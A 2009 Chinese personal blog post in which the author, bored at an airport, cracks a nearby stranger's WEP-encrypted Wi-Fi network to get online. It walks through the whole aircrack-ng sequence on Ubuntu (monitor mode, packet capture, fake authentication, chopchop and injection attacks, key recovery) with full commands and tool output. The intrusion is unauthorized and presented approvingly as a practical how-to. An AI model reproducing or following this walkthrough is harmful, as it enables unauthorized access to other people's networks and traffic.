2009年5月1日星期五

使用Ubuntu进行无线破解过程


前几天在接女朋友,在机场接女朋友,因为有二个小时,自己坐在机场蛮无聊的,就想拿电脑上网,但发现,基本都是加密的,没有可以用的.所以没法子,只有强行来硬的啦.整个过程一共花了20分钟

我的环境是Ubuntu9.04.用的笔记本是IBM X200 无线网卡是Intel(R) WiFi Link 5100 AGN.在linux下面做这些真是太方便了.以下为整个无线破解的过程.

开启wlan为监听模式
fukai@fukai-laptop:~$ sudo airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
3316 NetworkManager
3335 wpa_supplicant
3340 avahi-daemon
3341 avahi-daemon

Interface Chipset Driver

mon0 Unknown iwlagn - [phy0]
(monitor mode enabled on mon0

开始抓包(这个终端不要关掉)

fukai@fukai-laptop:~$sudo airodump-ng -w chop.cap --ivs --channel 11 mon0

CH 11 ][ BAT: 1 hour 13 mins ][ Elapsed: 19 mins ][ 2009-04-13 22:17

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E

00:02:2D:B4:31:01 -55 0 10 0 0 1 11 OPN C
00:02:2D:B4:5D:8D -51 100 10723 199 0 11 11 OPN C
00:02:2D:B4:30:F6 -72 96 10393 206 0 11 11 OPN C
00:0F:B5:79:04:98 -76 93 8306 24444 0 11 54 . WEP WEP OPN U
00:02:2D:B4:30:F2 -82 2 1463 46 0 6 11 OPN C
00:02:2D:B4:5D:78 -74 0 5 0 0 1 11 OPN C
00:02:2D:B4:31:5A -76 0 6 0 0 1 11 OPN C
00:0D:97:04:90:49 -76 0 0 1 0 1 54 . WPA2 CCMP PSK S
00:02:2D:B4:5D:64 -80 0 8 0 0 1 11 OPN C

BSSID STATION PWR Rate Lost Packets Probes
00:0F:B5:79:04:98 00:21:5D:90:E9:0A 0 1 - 0 0 129203
00:02:2D:B4:30:F2 00:16:EA:E1:57:44 -87 2 - 1 0 22
(not associated) 00:1C:B3:1C:BA:D0 -72 0 - 1 0 17
^C

进行FakeAuth攻击(我原来的x60到这步就死机)
fukai@fukai-laptop:~$ sudo aireplay-ng -1 0 -a 00:0F:B5:79:04:98 -h 00:21:5d:90:e9:0a mon0

注:-h为主机MAC地址 -a为需要破解的无线AP的地址

21:59:31 Waiting for beacon frame (BSSID: 00:0F:B5:79:04:98) on channel 11
21:59:31 Sending Authentication Request (Open System) [ACK]
21:59:31 Authentication successful
21:59:31 Sending Association Request [ACK]
21:59:31 Association successful :-) (AID: 1)


进行Chopchop攻击
fukai@fukai-laptop:~$ sudo aireplay-ng -4 -b 00:0F:B5:79:04:98 -h 00:21:5d:90:e9:0a mon0
22:00:05 Waiting for beacon frame (BSSID: 00:0F:B5:79:04:98) on channel 11
Read 2507 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:0F:B5:79:04:98
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:79:04:98

0x0000: 0842 0000 ffff ffff ffff 000f b579 0498 .B...........y..
0x0010: 000f b579 0498 005a 6772 0400 6e0c 067f ...y...Zgr..n..
0x0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e50 e4ab |.....1.&...^P..
0x0030: 3a1f 1b56 fca2 14f0 6f62 7d0b c94e 9d83 :..V....ob}..N..
0x0040: fca4 5e17 703f f414 828d bd8c 8d21 a2bc ..^.p?.......!..
0x0050: 8767 f385 61cc .g..a.

Use this packet ? y

Saving chosen packet in replay_src-0413-220115.cap

Offset 85 ( 0% done) | xor = F9 | pt = 35 | 92 frames written in 1569ms
Offset 84 ( 1% done) | xor = 82 | pt = E3 | 33 frames written in 561ms
Offset 83 ( 3% done) | xor = 63 | pt = E6 | 141 frames written in 2404ms
Offset 82 ( 5% done) | xor = 77 | pt = 84 | 198 frames written in 3373ms
Offset 81 ( 7% done) | xor = 67 | pt = 00 | 69 frames written in 1166ms
Offset 80 ( 9% done) | xor = 87 | pt = 00 | 3 frames written in 50ms
Offset 79 (11% done) | xor = BC | pt = 00 | 461 frames written in 7840ms
Offset 78 (13% done) | xor = A2 | pt = 00 | 452 frames written in 7665ms
Offset 77 (15% done) | xor = 21 | pt = 00 | 156 frames written in 2660ms
Offset 76 (17% done) | xor = 8D | pt = 00 | 256 frames written in 4360ms
Offset 75 (19% done) | xor = 8C | pt = 00 | 31 frames written in 519ms
Offset 74 (21% done) | xor = BD | pt = 00 | 12 frames written in 211ms
Offset 73 (23% done) | xor = 8D | pt = 00 | 681 frames written in 11572ms
Offset 72 (25% done) | xor = 82 | pt = 00 | 231 frames written in 3936ms
Offset 71 (26% done) | xor = 14 | pt = 00 | 126 frames written in 2148ms
Offset 70 (28% done) | xor = F4 | pt = 00 | 359 frames written in 6085ms
Offset 69 (30% done) | xor = 3F | pt = 00 | 143 frames written in 2443ms
Offset 68 (32% done) | xor = 70 | pt = 00 | 253 frames written in 4307ms
Offset 67 (34% done) | xor = 17 | pt = 00 | 70 frames written in 1182ms
Offset 66 (36% done) | xor = 5E | pt = 00 | 100 frames written in 1691ms
Offset 65 (38% done) | xor = A4 | pt = 00 | 164 frames written in 2779ms
Offset 64 (40% done) | xor = FC | pt = 00 | 1101 frames written in 18689ms
Offset 63 (42% done) | xor = E6 | pt = 65 | 1054 frames written in 17906ms
Offset 62 (44% done) | xor = 9D | pt = 00 | 226 frames written in 3819ms
Offset 61 (46% done) | xor = E6 | pt = A8 | 181 frames written in 3076ms
Offset 60 (48% done) | xor = 09 | pt = C0 | 16 frames written in 271ms
Offset 59 (50% done) | xor = 0B | pt = 00 | 55 frames written in 939ms
Offset 58 (51% done) | xor = 7D | pt = 00 | 71 frames written in 1197ms
Offset 57 (53% done) | xor = 62 | pt = 00 | 228 frames written in 3860ms
Offset 56 (55% done) | xor = 6F | pt = 00 | 331 frames written in 5626ms
Offset 55 (57% done) | xor = F0 | pt = 00 | 198 frames written in 3354ms
Offset 54 (59% done) | xor = 14 | pt = 00 | 64 frames written in 1089ms
Offset 53 (61% done) | xor = A3 | pt = 01 | 246 frames written in 4174ms
Offset 52 (63% done) | xor = FC | pt = 00 | 754 frames written in 12819ms
Offset 51 (65% done) | xor = FE | pt = A8 | 102 frames written in 1721ms
Offset 50 (67% done) | xor = DB | pt = C0 | 42 frames written in 721ms
Offset 49 (69% done) | xor = 87 | pt = 98 | 97 frames written in 1645ms
Offset 48 (71% done) | xor = 3E | pt = 04 | 47 frames written in 797ms
Offset 47 (73% done) | xor = D2 | pt = 79 | 63 frames written in 1064ms
Offset 46 (75% done) | xor = 51 | pt = B5 | 252 frames written in 4252ms
Offset 45 (76% done) | xor = 5F | pt = 0F | 108 frames written in 1828ms
Offset 44 (78% done) | xor = 5E | pt = 00 | 241 frames written in 4074ms
Offset 43 (80% done) | xor = F2 | pt = 01 | 193 frames written in 3257ms
Offset 42 (82% done) | xor = 03 | pt = 00 | 1126 frames written in 19048ms
Offset 41 (84% done) | xor = 18 | pt = 04 | 420 frames written in 7191ms
Offset 40 (86% done) | xor = 20 | pt = 06 | 586 frames written in 9941ms
Offset 39 (88% done) | xor = F1 | pt = 00 | 394 frames written in 6683ms
Offset 38 (90% done) | xor = 39 | pt = 08 | 228 frames written in 3868ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 1015 frames written in 17194ms
Offset 36 (94% done) | xor = FF | pt = 00 | 282 frames written in 4801ms
Offset 35 (96% done) | xor = F8 | pt = 06 | 1830 frames written in 31105ms
Sent 2386 packets, current guess: 48...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0413-220624.cap
Saving keystream in replay_dec-0413-220624.xor

Completed in 303s (0.16 bytes/s)

使用tcpdump查看生成的CAP文件内容
fukai@fukai-laptop:~$ tcpdump -s 0 -n -e -r replay_dec-0413-220624.cap
reading from file replay_dec-0413-220624.cap, link-type IEEE802_11 (802.11)
22:06:24.530668 DA:ff:ff:ff:ff:ff:ff BSSID:00:0f:b5:79:04:98 SA:00:0f:b5:79:04:98 LLC, dsap SNAP (0xaa) Individual, ssap SNAP (0xaa) Command, ctrl 0x03: oui Ethernet (0x000000), ethertype ARP (0x0806): arp who-has 192.168.0.101 tell 192.168.0.1

构造注入包
root@mickey:/home/mickey# packetforge-ng -0 -a 00:1D:0F:72:A0:3C -h 00:1C:BF:6A:E1:E9 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0204-000647.xor -w fvck.cap
Wrote packet to: fvck.cap

同时进行Interactive Attack攻击
fukai@fukai-laptop:~$ sudo packetforge-ng -0 -a 00:0f:b5:79:04:98 -h 00:21:5d:90:e9:0a -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0413-220624.xor -w fvck.cap
Wrote packet to: fvck.cap
fukai@fukai-laptop:~$ sudo aireplay-ng -2 -r fvck.cap mon0
No source MAC (-h) specified. Using the device MAC (00:21:5D:90:E9:0A)

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:0F:B5:79:04:98
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:5D:90:E9:0A

0x0000: 0841 0201 000f b579 0498 0021 5d90 e90a .A.....y...!]...
0x0010: ffff ffff ffff 8001 6772 0400 6e0c 067f ........gr..n..
0x0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e7e 0c42 |.....1.&...^~.B
0x0030: d78d 2401 035c 14f0 6f62 7d0b f619 6219 ..$..\..ob}...b.
0x0040: e060 df45 .`.E

Use this packet ? y

Saving chosen packet in replay_src-0413-220845.cap
You should also start airodump-ng to capture replies.

End of file.

破解
fukai@fukai-laptop:~$ sudo aircrack-ng *.ivs
Aircrack-ng 1.0 rc3

[00:00:02] Tested 296 keys (got 15985 IVs)

KB depth byte(vote)
0 5/ 6 01(20224) 00(19968) 61(19968) 06(19712) 7B(19712)
1 3/ 5 0F(20736) 24(20480) 99(20480) CD(20480) 0D(20224)
2 0/ 2 45(23040) 17(22272) 41(20992) B2(20992) 52(20736)
3 0/ 1 67(25600) 3E(20992) B3(20992) 57(20224) 76(20224)
4 4/ 5 89(20480) 82(20224) 4B(19968) 81(19968) E6(19712)

KEY FOUND! [ 01:23:45:67:89 ]
Decrypted correctly: 100%


扶凯[http://www.php-oa.com]

本文链接: http://www.php-oa.com/2009/04/16/ubuntu-airmon-ng.html

发帖者 时间:
标签:

1 条评论:

订阅: 博文评论 (Atom)